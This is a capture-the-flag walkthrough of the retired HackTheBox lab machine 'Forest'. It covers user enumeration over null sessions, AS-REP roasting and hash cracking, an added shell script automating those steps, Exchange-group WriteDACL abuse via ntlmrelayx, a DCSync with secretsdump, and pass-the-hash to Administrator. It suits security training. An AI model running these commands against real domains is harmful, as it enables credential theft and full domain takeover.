Hackthebox Forest
Today's box is Forest from HackTheBox. It is retired, so it can only be accessed with a subscription. These notes are from 2019.
Initial enumeration:
As usual we start with nmap.
On Forest, the initial scan shows ports 53, 88, 135, 139, 389, 445, 464, 593 and 636 open: DNS, Kerberos, RPC, SMB and LDAP/LDAPS, i.e. a domain controller.
A full-range scan additionally reveals 3268 and 3269 (LDAP global catalog). Run the full scan; the WinRM port that evil-winrm uses later only shows up that way.
Main scans
Run autorecon.py and wait for it to finish. One of its scans (the RPC/SMB enumeration) gives you a list of domain users.
Alternatively, open a null session with rpcclient (empty username, no password) and run enumdomusers to gather the users yourself.
To get user
Feed the user list to GetNPUsers.py (AS-REP roasting). Any account with Kerberos pre-authentication disabled returns an AS-REP that can be cracked offline; on this box that account is svc-alfresco.
python GetNPUsers.py htb.local/ -usersfile users.txt -format john -outputfile someMoreText.txt -dc-ip 10.10.10.161
Crack the hash with john to get the password.
Log in with evil-winrm using that password.
Grab user.txt.
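The user path above as one script, added here as an example and not part of the original notes. The two parsing steps are kept in functions so they can be checked against constructed tool output: extract_users turns an rpcclient enumdomusers listing into users.txt, and roasted_users reports which accounts came back from GetNPUsers.py (assuming the `$krb5asrep$<user>@<REALM>:...` line format that `-format john` writes, with an optional `23$` etype tag accepted as well). The sample listings are constructed, not captured from the box; the script assumes rpcclient, the impacket scripts, john and evil-winrm are on PATH, and only runs the network steps when FOREST_RUN=1.

```shell
#!/bin/sh
# Added example (not from the original notes): Forest user path.
set -eu

DC_IP="10.10.10.161"   # Forest DC, as in the notes
DOMAIN="htb.local"

# rpcclient's enumdomusers prints one account per line:
#   user:[NAME] rid:[0xHEX]
# Keep only NAME; this is the users.txt that GetNPUsers.py -usersfile wants.
extract_users() {
    sed -n 's/^user:\[\([^]]*\)\] rid:\[0x[0-9a-fA-F]*\]$/\1/p'
}

# GetNPUsers.py -format john writes $krb5asrep$USER@REALM:... per roastable
# account (some versions insert the etype as "23$" first). Return USER so we
# can see who actually came back before spending time cracking.
roasted_users() {
    sed -n 's/^\$krb5asrep\$\(23\$\)\{0,1\}\([^@]*\)@.*$/\2/p'
}

forest_user() {
    # 1. null session user enumeration -> users.txt
    rpcclient -U "" -N "$DC_IP" -c enumdomusers | extract_users > users.txt
    echo "enumerated $(grep -c . users.txt) accounts"

    # 2. AS-REP roast every listed account
    GetNPUsers.py "$DOMAIN/" -usersfile users.txt -format john \
        -outputfile asrep.txt -dc-ip "$DC_IP"
    echo "AS-REP hashes obtained for: $(roasted_users < asrep.txt | tr '\n' ' ')"

    # 3. crack offline (wordlist path is an assumption; adjust to taste)
    john --wordlist=/usr/share/wordlists/rockyou.txt asrep.txt
    john --show asrep.txt

    # 4. log in over WinRM with the cracked password and read user.txt:
    #    evil-winrm -i "$DC_IP" -u svc-alfresco -p '<cracked password>'
}

if [ "${FOREST_RUN:-0}" = "1" ]; then
    forest_user
fi
```

Run it with `FOREST_RUN=1 sh forest_user.sh` on the lab network; without the variable it only defines the helpers, which is what makes the parsing checkable offline.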
To get root
First, from the evil-winrm shell, add svc-alfresco to the two Exchange groups. This works because svc-alfresco sits in Account Operators through nested group membership, and Account Operators may modify non-protected groups like these; "Exchange Windows Permissions" is the one that matters, since it holds WriteDACL on the domain object.
net group "Exchange Servers" svc-alfresco /add
net group "Exchange Windows Permissions" svc-alfresco /add
Then start ntlmrelayx with LDAP on the DC as the target. With --escalate-user, a relayed account that has WriteDACL on the domain gets DCSync (replication) rights written into the domain ACL. Like so:
ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Browse to http://127.0.0.1 (ntlmrelayx listens on port 80 by default). The browser prompts for credentials; enter the svc-alfresco ones so the NTLM authentication gets relayed to LDAP.
Wait for the relay script to report that the user now has replication rights and that you can run secretsdump.
Then DCSync the domain hashes with secretsdump (the password is the one cracked earlier):
secretsdump.py htb.local/svc-alfresco:<password>@10.10.10.161 -just-dc-ntlm
The order of starting the relay and adding the groups does not matter; what matters is that svc-alfresco is already in "Exchange Windows Permissions" when the relayed LDAP authentication happens, because that membership is where the WriteDACL comes from.
If the escalation fails, check the group membership with net group "Exchange Windows Permissions" on the DC, then trigger the authentication to the relay again.
Once you have the secretsdump output, grab the Administrator line (RID 500). Its format is domain\name:rid:lmhash:nthash:::.
Log in with psexec using that hash (pass-the-hash):
python psexec.py htb.local/administrator@10.10.10.161 -hashes hash1:hash2
(replace hash1:hash2 with the LM and NT halves from the Administrator line, in exactly that lmhash:nthash order)
And now we have root.